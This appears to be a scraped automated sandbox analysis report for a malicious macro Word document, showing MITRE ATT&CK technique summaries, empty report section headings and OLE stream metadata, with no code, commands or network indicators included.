Description:	The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as Remote Desktop Protocol , instead of through a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command , or other potentially difficult to monitor interactions.
Tactics:	Execution
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 1072749549_VIRUS0045310798.doc

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Malware Configuration

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "1072749549_VIRUS0045310798.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 8593

General

VBA Code Keywords

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General

Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 308

General

Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 428

General

Stream Path: 1Table, File Type: data, Stream Size: 7557

General

Stream Path: Data, File Type: data, Stream Size: 318972

General

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 441

General

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3820